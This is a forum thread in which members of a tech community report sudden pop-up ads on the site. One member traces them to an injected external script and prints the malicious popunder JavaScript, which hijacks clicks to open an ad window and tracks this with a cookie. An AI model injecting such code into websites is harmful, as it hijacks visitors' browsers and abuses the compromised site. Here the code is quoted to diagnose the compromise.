Clicking on posts sometimes creates a pop-up advertising for www.youtube4mp3.com

MarcosSantiago

Well-known member
Starting today, Sunday OCt 20, GTAM is producing pop-ups, something that it has never done before.

Clicking on random threads, a pop-up advertising comes up for http://www.youtube4mp3.com/

Is anyone else seeing this?
Is this intentional, or is the site compromised?

Thank yooooouoooooo........
 
yeah you gotta stop visiting those porn sites and other questionable sites without proper script blockers.
I suggest downloading addons such as no-script for firefox if you are using that browser.

theres also ad-block for chrome
 
Starting today, Sunday OCt 20, GTAM is producing pop-ups, something that it has never done before.

Clicking on random threads, a pop-up advertising comes up for http://www.youtube4mp3.com/

Is anyone else seeing this?
Is this intentional, or is the site compromised?

Thank yooooouoooooo........

Same thing here !!

Untitled.jpg

theres also ad-block for chrome

Half the times, my online purchases are from the ads. If you do online shopping, I'd suggest to keep them unblocked. Soon or later, you'll catch a deal =)
 
Chrome and this is happening to me

Looks like GTAM has been hijacked. It's happening on my dev computer as well where there is no pr0n =P
 
Here too, in chrome on both my windows box and linux, so I doubt it is a problem on my end.
 
Ditto....Both my PC, laptop, and my ipad mini...i highly doubht my ipad mini is infected...

...and its only on GTAM.
 
Me too, and sometimes it plays rude sounds in the backgrounds too (was fun on a 16 person skype conference call :( ).

Also, some pages I noticed taking a super long time to load, waiting for http://www.dreambox-tunisie.com :(

dreambox.png


EDIT: Ahhh, just checked the GTAM page source, hijacked javascript file embedded in there with the dreambox site pointing to open the popup :(

Code:
<script type="text/javascript" src="http://www.dreambox-tunisie.com/vb/vbseo/includes/functions.js" ></script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" id="vbulletin_html">
<head>


Code:
//code by http://www.asraregy.com





var openx18 = false;

        function opena18(url)

        {

               if ( openx18 == true )

                {

                        return true;

                }

                win = window.open(url, 'open18', 'toolbar,status,resizable,scrollbars,menubar,location,height=768,width=1024');

                if ( win )

                {

                        win.blur();

                        openx18 = true;

                }

                return win;

        }

        function setCookie(name, value, time)

        {

            var expires = new Date();

            expires.setTime( expires.getTime() + time );

            document.cookie = name + '=' + value + '; expires=' + expires.toGMTString();

        }

        function getCookie(name) {

            var cookies = document.cookie.toString().split('; ');

            var cookie, c_name, c_value;

            for (var n=0; n<cookies.length; n++) {

                cookie  = cookies[n].split('=');

                c_name  = cookie[0];

                c_value = cookie[1];

                if ( c_name == name ) {

                    return c_value;

                }

            }

            return null;

        }

        function openz18()

        {

                if ( document.attachEvent )

                {

                        document.attachEvent( 'onclick', checkx18 );

                }

                else if ( document.addEventListener )

                {

                        document.addEventListener( 'click', checkx18, false );

                }

        }

        function checkx18(e)

        {

            if ( !getCookie('copenx18') ) {

                var e = e || window.event;

                var win = opena18('http://Www.youtube4mp3.com/');

                setCookie('copenx18', 1, 60*60*1000);



            }

        }

openz18();



//code by http://www.asraregy.com
 
Last edited:
EDIT: Ahhh, just checked the GTAM page source, hijacked javascript file embedded in there with the dreambox site pointing to open the popup :(
Paul, give this kind stranger access to your code so he can straighten things out right quick please!
 
Back
Top Bottom